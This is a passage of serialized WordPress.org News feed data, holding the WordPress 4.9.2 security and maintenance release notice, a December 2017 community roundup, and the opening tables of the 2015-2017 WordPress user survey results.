+0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:8:\"category\";a:3:{i:0;a:5:{s:4:\"data\";s:8:\"Releases\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:1;a:5:{s:4:\"data\";s:8:\"Security\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:2;a:5:{s:4:\"data\";s:3:\"4.9\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:34:\"https://wordpress.org/news/?p=5376\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:360:\"WordPress 4.9.2 is now available. This is a security and maintenance release for all versions since WordPress 3.7﻿. We strongly encourage you to update your sites immediately. An XSS vulnerability was discovered in the Flash fallback files in MediaElement, a library that is included with WordPress. Because the Flash files are no longer needed for [&#8230;]\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:8:\"Ian Dunn\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:40:\"http://purl.org/rss/1.0/modules/content/\";a:1:{s:7:\"encoded\";a:1:{i:0;a:5:{s:4:\"data\";s:3946:\"<p>WordPress 4.9.2 is now available. This is a <strong>security and maintenance release</strong> for all versions since WordPress 3.7﻿. We strongly encourage you to update your sites immediately.</p>\n\n<p>An XSS vulnerability was discovered in the Flash fallback files in MediaElement, a library that is included with WordPress. Because the Flash files are no longer needed for most use cases, they have been removed from WordPress.</p>\n\n<p>MediaElement has released a new version that contains a fix for the bug, and <a href=\"https://wordpress.org/plugins/mediaelement-flash-fallbacks/\">a WordPress plugin containing the fixed files</a> is available in the plugin repository.</p>\n\n<p>Thank you to the reporters of this issue for practicing <a href=\"https://make.wordpress.org/core/handbook/testing/reporting-security-vulnerabilities/\">responsible security disclosure</a>: <a href=\"https://opnsec.com\">Enguerran Gillier</a> and <a href=\"https://widiz.com/\">Widiz﻿</a>.</p>\n\n<p>21 other bugs were fixed in WordPress 4.9.2. Particularly of note were:</p>\n\n<ul>\n    <li>JavaScript errors that prevented saving posts in Firefox have been fixed.</li>\n    <li>The previous taxonomy-agnostic behavior of <code>get_category_link()</code> and <code>category_description()</code> was restored.</li>\n    <li>Switching themes will now attempt to restore previous widget assignments, even when there are no sidebars to map.<br /></li>\n</ul>\n\n<p>The Codex has <a href=\"https://codex.wordpress.org/Version_4.9.2\">more information about all of the issues fixed in 4.9.2</a>, if you&#x27;d like to learn more.</p>\n\n<p>﻿<a href=\"https://wordpress.org/download/\"></a><a href=\"https://wordpress.org/download/\">Download WordPress 4.9.2</a> or venture over to Dashboard → Updates and click &quot;Update Now.&quot; Sites that support automatic background updates are already beginning to update automatically.</p>\n\n<p>Thank you to everyone who contributed to WordPress 4.9.2:</p>\n\n<p><a href=\"https://profiles.wordpress.org/0x6f0/\">0x6f0</a>, <a href=\"https://profiles.wordpress.org/jorbin/\">Aaron Jorbin</a>, <a href=\"https://profiles.wordpress.org/afercia/\">Andrea Fercia</a>, <a href=\"https://profiles.wordpress.org/aduth/\">Andrew Duthie</a>, <a href=\"https://profiles.wordpress.org/azaozz/\">Andrew Ozz</a>, <a href=\"https://profiles.wordpress.org/blobfolio/\">Blobfolio</a>, <a href=\"https://profiles.wordpress.org/boonebgorges/\">Boone Gorges</a>, <a href=\"https://profiles.wordpress.org/icaleb/\">Caleb Burks</a>, <a href=\"https://profiles.wordpress.org/poena/\">Carolina Nymark</a>, <a href=\"https://profiles.wordpress.org/chasewg/\">chasewg</a>, <a href=\"https://profiles.wordpress.org/chetan200891/\">Chetan Prajapati</a>, <a href=\"https://profiles.wordpress.org/dd32/\">Dion Hulse</a>, <a href=\"https://profiles.wordpress.org/hardik-amipara/\">Hardik Amipara</a>, <a href=\"https://profiles.wordpress.org/ionvv/\">ionvv</a>, <a href=\"https://profiles.wordpress.org/jaswrks/\">Jason Caldwell</a>, <a href=\"https://profiles.wordpress.org/jbpaul17/\">Jeffrey Paul</a>, <a href=\"https://profiles.wordpress.org/jeremyfelt/\">Jeremy Felt</a>, <a href=\"https://profiles.wordpress.org/joemcgill/\">Joe McGill</a>, <a href=\"https://profiles.wordpress.org/johnschulz/\">johnschulz</a>, <a href=\"https://profiles.wordpress.org/juiiee8487/\">Juhi Patel</a>, <a href=\"https://profiles.wordpress.org/obenland/\">Konstantin Obenland</a>, <a href=\"https://profiles.wordpress.org/markjaquith/\">Mark Jaquith</a>, <a href=\"https://profiles.wordpress.org/rabmalin/\">Nilambar Sharma</a>, <a href=\"https://profiles.wordpress.org/peterwilsoncc/\">Peter Wilson</a>, <a href=\"https://profiles.wordpress.org/rachelbaker/\">Rachel Baker</a>, <a href=\"https://profiles.wordpress.org/rinkuyadav999/\">Rinku Y</a>, <a href=\"https://profiles.wordpress.org/sergeybiryukov/\">Sergey Biryukov</a>, and <a href=\"https://profiles.wordpress.org/westonruter/\">Weston Ruter</a>.﻿<strong></strong><br /></p>\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:30:\"com-wordpress:feed-additions:1\";a:1:{s:7:\"post-id\";a:1:{i:0;a:5:{s:4:\"data\";s:4:\"5376\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:6;a:6:{s:4:\"data\";s:33:\"\n		\n		\n		\n		\n				\n\n		\n		\n				\n			\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:4:{s:0:\"\";a:6:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:37:\"The Month in WordPress: December 2017\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:72:\"https://wordpress.org/news/2018/01/the-month-in-wordpress-december-2017/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Wed, 03 Jan 2018 10:00:24 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:8:\"category\";a:1:{i:0;a:5:{s:4:\"data\";s:18:\"Month in WordPress\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:34:\"https://wordpress.org/news/?p=5424\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:311:\"Activity slowed down in December in the WordPress community, particularly in the last two weeks. However, the month started off with a big event and work pushed forward in a number of key areas of the project. Read on to find out more about what transpired in the WordPress community as 2017 came to a [&#8230;]\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:15:\"Hugh Lashbrooke\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:40:\"http://purl.org/rss/1.0/modules/content/\";a:1:{s:7:\"encoded\";a:1:{i:0;a:5:{s:4:\"data\";s:4711:\"<p>Activity slowed down in December in the WordPress community, particularly in the last two weeks. However, the month started off with a big event and work pushed forward in a number of key areas of the project. Read on to find out more about what transpired in the WordPress community as 2017 came to a close.</p>\n\n<hr class=\"wp-block-separator\" />\n\n<h2>WordCamp US 2017 Brings the Community Together</h2>\n\n<p>The latest edition of <a href=\"https://2017.us.wordcamp.org/\">WordCamp US</a> took place last month in Nashville on December 1-3. The event brought together over 1,400 WordPress enthusiasts from around the world, fostering a deeper, more engaged global community.</p>\n\n<p>While attending a WordCamp is always a unique experience, you can catch up on <a href=\"https://wordpress.tv/event/wordcamp-us-2017/\">the sessions on WordPress.tv</a> and look through <a href=\"https://www.facebook.com/pg/WordCampUSA/photos/?tab=albums\">the event photos on Facebook</a> to get a feel for how it all happened. Of course, <a href=\"https://wordpress.tv/2017/12/04/matt-mullenweg-state-of-the-word-2017/\">Matt Mullenweg’s State of the Word</a> talk is always one of the highlights at this event.</p>\n\n<p>The next WordCamp US will be held in Nashville again in 2018, but if you would like to see it hosted in your city in 2019 and 2020, then <a href=\"https://make.wordpress.org/community/2017/12/19/apply-to-host-wordcamp-us-2019-2020/\">you have until February 2 to apply</a>.</p>\n\n<h2>WordPress User Survey Data Is Published</h2>\n\n<p>Over the last few years, tens of thousands of WordPress users all over the world have filled out the annual WordPress user survey. The results of that survey are used to improve the WordPress project, but that data has mostly remained private. This has changed now and <a href=\"https://wordpress.org/news/2017/12/wordpress-user-survey-data-for-2015-2017/\">the results from the last three surveys are now publicly available</a> for everyone to analyze.</p>\n\n<p>The data will be useful to anyone involved in WordPress since it provides a detailed look at who uses WordPress and what they do with it — information that can help inform product development decisions across the board.</p>\n\n<h2>New WordPress.org Team for the Tide Project</h2>\n\n<p>As announced at WordCamp US, <a href=\"https://make.wordpress.org/tide/2017/12/02/new-home/\">the Tide project is being brought under the WordPress.org umbrella</a> to be managed and developed by the community.</p>\n\n<p>Tide is a series of automated tests run against every plugin and theme in the directory to help WordPress users make informed decisions about the plugins and themes that they choose to install.</p>\n\n<p>To get involved in developing Tide, jump into the #tide channel in the <a href=\"https://make.wordpress.org/chat/\">Making WordPress Slack group</a>, and follow <a href=\"https://make.wordpress.org/tide/\">the Tide team blog</a>.</p>\n\n<hr class=\"wp-block-separator\" />\n\n<h2>Further Reading:</h2>\n\n<ul>\n    <li>If you’re following the development of Gutenberg, or if you want a primer on where it’s headed, then <a href=\"https://wordpress.tv/2017/12/10/morten-rand-hendriksen-gutenberg-and-the-wordpress-of-tomorrow/\">Morten Rand-Hendriksen’s talk from WordCamp US</a> is a must watch.</li>\n    <li>The annual surveys for WordPress <a href=\"https://wordpressdotorg.polldaddy.com/s/2017-annual-meetup-member-survey\">meetup members</a> and <a href=\"https://wordpressdotorg.polldaddy.com/s/2017-annual-meetup-organizer-survey\">meetup organizers</a> are available for people to fill out — if you’re involved in or attend your local meetup group then be sure to complete those.</li>\n    <li>10up has <a href=\"https://distributorplugin.com/\">a brand new plugin in beta</a> that will assist with powerful and flexible content publishing and syndication across WordPress sites.</li>\n    <li><a href=\"https://make.wordpress.org/community/2017/12/07/should-we-change-the-default-wordcamp-theme-to-campsite-2017/\">The Community Team is exploring a move</a> to make the recently developed CampSite theme the default theme for all new WordCamp websites. This is the theme that was developed and employed for <a href=\"https://2017.europe.wordcamp.org\">WordCamp Europe 2017</a>.</li>\n    <li>The team working on the multisite features of WordPress Core has recently published <a href=\"https://make.wordpress.org/core/2017/12/19/multisite-roadmap-published/\">their planned roadmap for development</a>.</li>\n</ul>\n\n<p><em>If you have a story we should consider including in the next “Month in WordPress” post, please <a href=\"https://make.wordpress.org/community/month-in-wordpress-submissions/\">submit it here</a>.</em></p>\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:30:\"com-wordpress:feed-additions:1\";a:1:{s:7:\"post-id\";a:1:{i:0;a:5:{s:4:\"data\";s:4:\"5424\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:7;a:6:{s:4:\"data\";s:39:\"\n		\n		\n		\n		\n				\n		\n		\n\n		\n		\n				\n			\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:4:{s:0:\"\";a:6:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:40:\"WordPress User Survey Data for 2015-2017\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:76:\"https://wordpress.org/news/2017/12/wordpress-user-survey-data-for-2015-2017/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Fri, 22 Dec 2017 21:40:57 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:8:\"category\";a:3:{i:0;a:5:{s:4:\"data\";s:7:\"General\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:1;a:5:{s:4:\"data\";s:6:\"WrapUp\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:2;a:5:{s:4:\"data\";s:6:\"survey\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:34:\"https://wordpress.org/news/?p=5310\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:321:\"For many years, we&#8217;ve invited folks to tell us how they use WordPress by filling out an annual survey. In the past, interesting results from this survey have been shared in the annual State of the Word address. This year, for the first time, the results of the 2017 survey are being published on WordPress [&#8230;]\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:16:\"Andrea Middleton\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:40:\"http://purl.org/rss/1.0/modules/content/\";a:1:{s:7:\"encoded\";a:1:{i:0;a:5:{s:4:\"data\";s:64131:\"<p>For many years, we&#8217;ve invited folks to tell us how they use WordPress by filling out an annual survey. In the past, interesting results from this survey have been shared in the annual <a href=\"https://ma.tt/2017/12/state-of-the-word-2017/\">State of the Word</a> address. This year, for the first time, the results of the 2017 survey are being published on WordPress News, along with the results of the 2015 and 2016 survey.</p>\n<p>So that information from the survey doesn&#8217;t reveal anything that respondents might consider private, we do not publish a full export of the raw data. We’d love to make this information as accessible as possible, though, so if you have a suggestion for an OS project or tool we can put the data into that allows people to play with it that still protects individual response privacy, please leave a comment on this post!</p>\n<h4>Major Groups</h4>\n<p>This survey features multiple groups, dividing respondents at the first question:</p>\n<blockquote><p>Which of the following best describes how you use WordPress? (<em>Mandatory</em>)</p></blockquote>\n<p>Those who selected &#8220;I&#8217;m a designer or developer, or I work for a company that designs/develops websites; I use WordPress to build websites and/or blogs for others. (This might include theme development, writing plugins, or other custom work.)&#8221; were served questions from what we&#8217;ll call the &#8220;WordPress Professionals&#8221; group.</p>\n<p>This &#8220;WordPress Professionals&#8221; group is further divided into WordPress Company and WordPress Freelancer/Hobbyist groups, based on how the respondent answered the question, &#8220;Which of the following best describes your involvement with WordPress? (2015) / Do you work for a company, or on your own? (2016-17).&#8221;</p>\n<p>Those who selected &#8220;I own, run, or contribute to a blog or website that is built with WordPress.&#8221; were served questions in what we&#8217;re calling the &#8220;WordPress Users&#8221; group.</p>\n<p>The relevant survey group is noted in each table below. In the case of questions that were served to different groups in 2015 but then served to all respondents in 2016 and 2017, the group responses from 2015 have been consolidated into one set of data for easier comparison between years.</p>\n<h4>Survey results</h4>\n<p><a href=\"#pro\">Jump to answers from WordPress Professionals</a></p>\n<p><a href=\"#user\">Jump to answers from WordPress Users</a></p>\n<p><a href=\"#all\">Jump to answers from All Respondents</a></p>\n<p><!--td {border: 1px solid #ccc;}br {mso-data-placement:same-cell;}--></p>\n<h3>Which of the following best describes how you use WordPress? (Mandatory)</h3>\n<table dir=\"ltr\" border=\"1\" cellspacing=\"0\" cellpadding=\"0\">\n<colgroup>\n<col width=\"554\" />\n<col width=\"47\" />\n<col width=\"36\" />\n<col width=\"47\" />\n<col width=\"51\" />\n<col width=\"47\" />\n<col width=\"51\" /></colgroup>\n<tbody>\n<tr>\n<td></td>\n<td style=\"text-align: center\" colspan=\"2\" rowspan=\"1\"><strong>2015</strong></td>\n<td style=\"text-align: center\" colspan=\"2\" rowspan=\"1\"><strong>2016</strong></td>\n<td style=\"text-align: center\" colspan=\"2\" rowspan=\"1\"><strong>2017</strong></td>\n</tr>\n<tr>\n<td>Number of responses (since this question was mandatory, the number of responses here is the total number for the survey)</td>\n<td>45,995</td>\n<td></td>\n<td>15,585</td>\n<td></td>\n<td>16,029</td>\n<td></td>\n</tr>\n<tr>\n<td>I&#8217;m a designer or developer, or I work for a company that designs/develops websites; I use WordPress to build websites and/or blogs for others. (This might include theme development, writing plugins, other custom work.)</td>\n<td>26,662</td>\n<td>58%</td>\n<td>8,838</td>\n<td>57%</td>\n<td>9,099</td>\n<td>57%</td>\n</tr>\n<tr>\n<td>I own, run, or contribute to a blog or website that is built with WordPress.</td>\n<td>16,130</td>\n<td>35%</td>\n<td>5,293</td>\n<td>34%</td>\n<td>5,625</td>\n<td>35%</td>\n</tr>\n<tr>\n<td>Neither of the above.</td>\n<td>3,204</td>\n<td>7%</td>\n<td>1,460</td>\n<td>9%</td>\n<td>1,306</td>\n<td>8%</td>\n</tr>\n</tbody>\n</table>\n<h2 id=\"pro\">WordPress Professionals</h2>\n<h3><strong>Which of the following best describes your involvement with WordPress? (Mandatory, 2015) / Do you work for a company, or on your own? (Mandatory, 2016-17)</strong></h3>\n<table dir=\"ltr\" border=\"1\" cellspacing=\"0\" cellpadding=\"0\">\n<colgroup>\n<col width=\"554\" />\n<col width=\"47\" />\n<col width=\"36\" />\n<col width=\"47\" />\n<col width=\"36\" />\n<col width=\"47\" />\n<col width=\"36\" /></colgroup>\n<tbody>\n<tr>\n<td></td>\n<td style=\"text-align: center\" colspan=\"2\" rowspan=\"1\"><strong>2015</strong></td>\n<td style=\"text-align: center\" colspan=\"2\" rowspan=\"1\"><strong>2016</strong></td>\n<td style=\"text-align: center\" colspan=\"2\" rowspan=\"1\"><strong>2017</strong></td>\n</tr>\n<tr>\n<td><em>Group: WordPress Professional</em></td>\n<td></td>\n<td></td>\n<td></td>\n<td></td>\n<td></td>\n<td></td>\n</tr>\n<tr>\n<td>Number of responses</td>\n<td>26,699</td>\n<td></td>\n<td>8,838</td>\n<td></td>\n<td>9,101</td>\n<td></td>\n</tr>\n<tr>\n<td>My primary job is working for a company or organization that uses WordPress.</td>\n<td>9,505</td>\n<td>36%</td>\n<td>3,529</td>\n<td>40%</td>\n<td>3,660</td>\n<td>40%</td>\n</tr>\n<tr>\n<td>My primary job is as a self-employed designer or developer that uses WordPress.</td>\n<td>9,310</td>\n<td>35%</td>\n<td>3,188</td>\n<td>36%</td>\n<td>3,440</td>\n<td>38%</td>\n</tr>\n<tr>\n<td>I earn money from part-time or occasional freelance work involving WordPress.</td>\n<td>5,954</td>\n<td>22%</td>\n<td>1,633</td>\n<td>18%</td>\n<td>1,590</td>\n<td>17%</td>\n</tr>\n<tr>\n<td>Work that I do involving WordPress is just a hobby, I don&#8217;t make money from it.</td>\n<td>1,930</td>\n<td>7%</td>\n<td>491</td>\n<td>6%</td>\n<td>411</td>\n<td>5%</td>\n</tr>\n</tbody>\n</table>\n<h3>How does your company or organization work with WordPress?</h3>\n<table dir=\"ltr\" border=\"1\" cellspacing=\"0\" cellpadding=\"0\">\n<colgroup>\n<col width=\"554\" />\n<col width=\"47\" />\n<col width=\"36\" />\n<col width=\"47\" />\n<col width=\"36\" />\n<col width=\"47\" />\n<col width=\"36\" /></colgroup>\n<tbody>\n<tr>\n<td></td>\n<td style=\"text-align: center\" colspan=\"2\" rowspan=\"1\"><strong>2015</strong></td>\n<td style=\"text-align: center\" colspan=\"2\" rowspan=\"1\"><strong>2016</strong></td>\n<td style=\"text-align: center\" colspan=\"2\" rowspan=\"1\"><strong>2017</strong></td>\n</tr>\n<tr>\n<td><em>Group: WordPress Company</em></td>\n<td></td>\n<td></td>\n<td></td>\n<td></td>\n<td></td>\n<td></td>\n</tr>\n<tr>\n<td>Number of responses</td>\n<td>9,342</td>\n<td></td>\n<td></td>\n<td></td>\n<td></td>\n<td></td>\n</tr>\n<tr>\n<td>Build/design and/or maintain websites or blogs for other people, companies, or organizations.</td>\n<td>7,772</td>\n<td>27%</td>\n<td></td>\n<td></td>\n<td></td>\n<td></td>\n</tr>\n<tr>\n<td>Develop or customize themes.</td>\n<td>5,404</td>\n<td>19%</td>\n<td></td>\n<td></td>\n<td></td>\n<td></td>\n</tr>\n<tr>\n<td>Build/design and/or maintain websites or blogs for my own use.</td>\n<td>4,733</td>\n<td>16%</td>\n<td></td>\n<td></td>\n<td></td>\n<td></td>\n</tr>\n<tr>\n<td>Host websites for customers.</td>\n<td>4,397</td>\n<td>15%</td>\n<td></td>\n<td></td>\n<td></td>\n<td></td>\n</tr>\n<tr>\n<td>Develop or distribute plugins.</td>\n<td>3,181</td>\n<td>11%</td>\n<td></td>\n<td></td>\n<td></td>\n<td></td>\n</tr>\n<tr>\n<td>Provide educational resources to help others to use WordPress.</td>\n<td>1,349</td>\n<td>5%</td>\n<td></td>\n<td></td>\n<td></td>\n<td></td>\n</tr>\n<tr>\n<td>Sponsor and/or attend WordCamps.</td>\n<td>1,127</td>\n<td>4%</td>\n<td></td>\n<td></td>\n<td></td>\n<td></td>\n</tr>\n<tr>\n<td>Contribute bug reports and/or patches to WordPress core.</td>\n<td>914</td>\n<td>3%</td>\n<td></td>\n<td></td>\n<td></td>\n<td></td>\n</tr>\n<tr>\n<td>Other Option</td>\n<td>182</td>\n<td> 1%</td>\n<td></td>\n<td></td>\n<td></td>\n<td></td>\n</tr>\n<tr>\n<td>Number of responses</td>\n<td></td>\n<td></td>\n<td>3,457</td>\n<td></td>\n<td>3,598</td>\n<td></td>\n</tr>\n<tr>\n<td>We make websites for others.</td>\n<td></td>\n<td></td>\n<td>2,695</td>\n<td>24%</td>\n<td>2,722</td>\n<td>23%</td>\n</tr>\n<tr>\n<td>We make websites for ourselves.</td>\n<td></td>\n<td></td>\n<td>2,355</td>\n<td>21%</td>\n<td>2,470</td>\n<td>21%</td>\n</tr>\n<tr>\n<td>We develop or customize themes.</td>\n<td></td>\n<td></td>\n<td>1,866</td>\n<td>16%</td>\n<td>1,910</td>\n<td>16%</td>\n</tr>\n<tr>\n<td>We host websites for others.</td>\n<td></td>\n<td></td>\n<td>1,564</td>\n<td>14%</td>\n<td>1,595</td>\n<td>14%</td>\n</tr>\n<tr>\n<td>We develop or distribute plugins.</td>\n<td></td>\n<td></td>\n<td>1,283</td>\n<td>11%</td>\n<td>1,342</td>\n<td>11%</td>\n</tr>\n<tr>\n<td>We provide educational resources to help others to use WordPress.</td>\n<td></td>\n<td></td>\n<td>581</td>\n<td>5%</td>\n<td>631</td>\n<td>5%</td>\n</tr>\n<tr>\n<td>We sponsor and/or attend WordCamps.</td>\n<td></td>\n<td></td>\n<td>561</td>\n<td>5%</td>\n<td>579</td>\n<td>5%</td>\n</tr>\n<tr>\n<td>We contribute bug reports and/or patches to WordPress core.</td>\n<td></td>\n<td></td>\n<td>444</td>\n<td>4%</td>\n<td>468</td>\n<td>4%</td>\n</tr>\n<tr>\n<td>Other Option</td>\n<td></td>\n<td></td>\n<td>98</td>\n<td>1%</td>\n<td>96</td>\n<td>1%</td>\n</tr>\n</tbody>\n</table>\n<p><strong>How would you describe the business of your typical client(s)? (2015) / How would you describe the business of your typical client/customer? (2016, 2017)</strong></p>\n<table dir=\"ltr\" border=\"1\" cellspacing=\"0\" cellpadding=\"0\">\n<colgroup>\n<col width=\"554\" />\n<col width=\"47\" />\n<col width=\"36\" />\n<col width=\"47\" />\n<col width=\"36\" />\n<col width=\"47\" />\n<col width=\"36\" /></colgroup>\n<tbody>\n<tr>\n<td></td>\n<td style=\"text-align: center\" colspan=\"2\" rowspan=\"1\"><strong>2015</strong></td>\n<td style=\"text-align: center\" colspan=\"2\" rowspan=\"1\"><strong>2016</strong></td>\n<td style=\"text-align: center\" colspan=\"2\" rowspan=\"1\"><strong>2017</strong></td>\n</tr>\n<tr>\n<td><em>Group: WordPress Company</em></td>\n<td></td>\n<td></td>\n<td></td>\n<td></td>\n<td></td>\n<td></td>\n</tr>\n<tr>\n<td>Number of responses</td>\n<td>9,154</td>\n<td></td>\n<td>3,317</td>\n<td></td>\n<td>3,498</td>\n<td></td>\n</tr>\n<tr>\n<td>Small business</td>\n<td>6,893</td>\n<td>32%</td>\n<td>2,398</td>\n<td>31%</td>\n<td>2,510</td>\n<td>31%</td>\n</tr>\n<tr>\n<td>Large business or Enterprise</td>\n<td>3,635</td>\n<td>17%</td>\n<td>1,361</td>\n<td>18%</td>\n<td>1,447</td>\n<td>18%</td>\n</tr>\n<tr>\n<td>Non-profit</td>\n<td>2,644</td>\n<td>12%</td>\n<td>934</td>\n<td>12%</td>\n<td>992</td>\n<td>12%</td>\n</tr>\n<tr>\n<td>Individual</td>\n<td>2,600</td>\n<td>12%</td>\n<td>888</td>\n<td>12%</td>\n<td>1,022</td>\n<td>12%</td>\n</tr>\n<tr>\n<td>Education</td>\n<td>2,344</td>\n<td>11%</td>\n<td>854</td>\n<td>11%</td>\n<td>966</td>\n<td>12%</td>\n</tr>\n<tr>\n<td>Website development (sub-contracting)</td>\n<td>2,065</td>\n<td>10%</td>\n<td>637</td>\n<td>8%</td>\n<td>677</td>\n<td>8%</td>\n</tr>\n<tr>\n<td>Government</td>\n<td>1,410</td>\n<td>6%</td>\n<td>524</td>\n<td>7%</td>\n<td>552</td>\n<td>7%</td>\n</tr>\n<tr>\n<td>Other Option</td>\n<td>127</td>\n<td>1%</td>\n<td>66</td>\n<td>1%</td>\n<td>64</td>\n<td>1%</td>\n</tr>\n</tbody>\n</table>\n<p><strong>How does your company or organization use WordPress when developing websites? (2015) / When making websites, how does your company or organization use WordPress? (2016, 2017)</strong></p>\n<table dir=\"ltr\" border=\"1\" cellspacing=\"0\" cellpadding=\"0\">\n<colgroup>\n<col width=\"554\" />\n<col width=\"47\" />\n<col width=\"36\" />\n<col width=\"47\" />\n<col width=\"36\" />\n<col width=\"47\" />\n<col width=\"36\" /></colgroup>\n<tbody>\n<tr>\n<td></td>\n<td style=\"text-align: center\" colspan=\"2\" rowspan=\"1\"><strong>2015</strong></td>\n<td style=\"text-align: center\" colspan=\"2\" rowspan=\"1\"><strong>2016</strong></td>\n<td style=\"text-align: center\" colspan=\"2\" rowspan=\"1\"><strong>2017</strong></td>\n</tr>\n<tr>\n<td><em>Group: WordPress Company</em></td>\n<td></td>\n<td></td>\n<td></td>\n<td></td>\n<td></td>\n<td></td>\n</tr>\n<tr>\n<td>Number of responses</td>\n<td>9,078</td>\n<td></td>\n<td>3,369</td>\n<td></td>\n<td>3,552</td>\n<td></td>\n</tr>\n<tr>\n<td>Mostly as a content management system (CMS)</td>\n<td>6,361</td>\n<td>70%</td>\n<td>2,482</td>\n<td>74%</td>\n<td>2,640</td>\n<td>74%</td>\n</tr>\n<tr>\n<td>About half the time as a blogging platform and half the time as a CMS</td>\n<td>1,222</td>\n<td>13%</td>\n<td>370</td>\n<td>11%</td>\n<td>383</td>\n<td>11%</td>\n</tr>\n<tr>\n<td>Mostly as a blogging 